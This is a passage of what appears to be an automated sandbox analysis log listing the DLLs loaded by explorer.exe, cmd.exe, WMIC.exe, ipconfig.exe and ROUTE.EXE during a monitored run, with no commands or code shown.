    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: aepic.dll
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
    Source: C:\Windows\explorer.exeSection loaded: userenv.dll
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
    Source: C:\Windows\explorer.exeSection loaded: wldp.dll
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: propsys.dll
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
    Source: C:\Windows\explorer.exeSection loaded: netutils.dll
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\explorer.exeSection loaded: wininet.dll
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
    Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
